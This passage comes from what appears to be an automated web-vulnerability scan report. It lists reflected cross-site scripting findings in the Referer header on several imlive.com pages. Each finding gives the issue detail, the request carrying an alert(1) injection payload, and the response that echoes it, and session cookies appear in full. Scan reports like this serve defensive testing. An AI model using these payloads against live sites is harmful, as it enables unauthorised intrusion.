QgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 30-Jan-2011 01:45:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:45:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb266870=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:45:12 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 29 Jan 2011 01:45:12 GMT
Content-Length: 966

document.write('<iframe frameborder="0" width="300" height="250" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=AAAAAAAA6T8AAAAAAADkPwAAAAAAAOQ_AAAAAAA
...[SNIP]...
7%2C+45546%2C+1296265512%29%3Buf%28%27r%27%2C+173794%2C+1296265512%29%3B&cnd=!NQ69lAjq4wIQ4s0KGAAg2gco4gYxlkOLbOdT4T9CCggAEAAYACABKAFIAVAAWOwEYABonAU.&referrer=http://www.google.com/search%3Fhl=en%26q=9ec55'-alert(1)-'3deb7da7e95">
...[SNIP]...

4.934. http://imlive.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8adbd'-alert(1)-'4f9aafda70b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=8adbd'-alert(1)-'4f9aafda70b

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0W5s89nS82L1Y30bT54fyWa09YbZxWHM4PkcHt5cVPiM; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:46 GMT
Connection: close
Content-Length: 19013
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/homepage.aspx&he=imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=8adbd'-alert(1)-'4f9aafda70b&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.935. http://imlive.com/GuestDiscountClubs.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /GuestDiscountClubs.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c53c'-alert(1)-'71f23548084 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /GuestDiscountClubs.aspx HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=3c53c'-alert(1)-'71f23548084

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:00 GMT
Connection: close
Content-Length: 40625
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/user.aspx&he=imlive.com&ul=/webcam-sign-up/&rf=http://www.google.com/search?hl=en^q=3c53c'-alert(1)-'71f23548084&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.936. http://imlive.com/SiteInformation.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /SiteInformation.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7a8e5'><script>alert(1)</script>0a7d7dac8a3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /SiteInformation.html HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=7a8e5'><script>alert(1)</script>0a7d7dac8a3

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:46 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:46 GMT
Connection: close
Content-Length: 28320
Vary: Accept-Encoding


<html>
<head>
<meta name="keywords" content="live Video Chat, Video Chat live, Video Chat live, live Video Chat, webcam chat, live web cam, webcam live, live webcam, web cam live, web cam communti
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/live-sex-chats/terminology/&lr=1107816009&ud=0&pe=siteinformation.asp&rf=http://www.google.com/search?hl=en^q=7a8e5'><script>alert(1)</script>0a7d7dac8a3&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.937. http://imlive.com/awardarena/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /awardarena/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46fbb'-alert(1)-'f6926b45b35 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /awardarena/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=46fbb'-alert(1)-'f6926b45b35

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:59 GMT
Connection: close
Content-Length: 24721
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostawards.aspx&he=imlive.com&ul=/awardarena/&rf=http://www.google.com/search?hl=en^q=46fbb'-alert(1)-'f6926b45b35&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.938. http://imlive.com/become_celeb.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /become_celeb.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f517a'><script>alert(1)</script>7528764405c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /become_celeb.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=f517a'><script>alert(1)</script>7528764405c

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSx9rb%2Be3%2BOTRTIW6m11TETaF6QXi%2ByFiLHg95wp%2FGOR9lSwrZUtExpRjmx1VFU8tmLVZ5WOhWeG2PPzltaaotqhw%3D%3D; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:59 GMT
Connection: close
Content-Length: 13435
Vary: Accept-Encoding


<html>
<head>
<title>Celebrity Porn Star Sign Up at ImLive</title>
<meta name="description" content="Already a Celebrity Porn star? Access millions of ImLive members through celebrity Porn Star L
...[SNIP]...
img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/live-sex-chats/pornstars-sign-up/&lr=1107816008&ud=0&pe=become_celeb.asp&rf=http://www.google.com/search?hl=en^q=f517a'><script>alert(1)</script>7528764405c&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.939. http://imlive.com/become_host.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /become_host.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6689'-alert(1)-'b778a8b9f7a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /become_host.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=f6689'-alert(1)-'b778a8b9f7a

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:31 GMT
Connection: close
Content-Length: 21060
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/becomehost.aspx&he=imlive.com&ul=/becomehost.aspx&rf=http://www.google.com/search?hl=en^q=f6689'-alert(1)-'b778a8b9f7a&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.940. http://imlive.com/becomehost.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /becomehost.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98226'-alert(1)-'ff8df7e9357 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /becomehost.aspx HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=98226'-alert(1)-'ff8df7e9357

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:01 GMT
Connection: close
Content-Length: 21060
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/becomehost.aspx&he=imlive.com&ul=/becomehost.aspx&rf=http://www.google.com/search?hl=en^q=98226'-alert(1)-'ff8df7e9357&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.941. http://imlive.com/categoryfs.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /categoryfs.asp

Issue detail

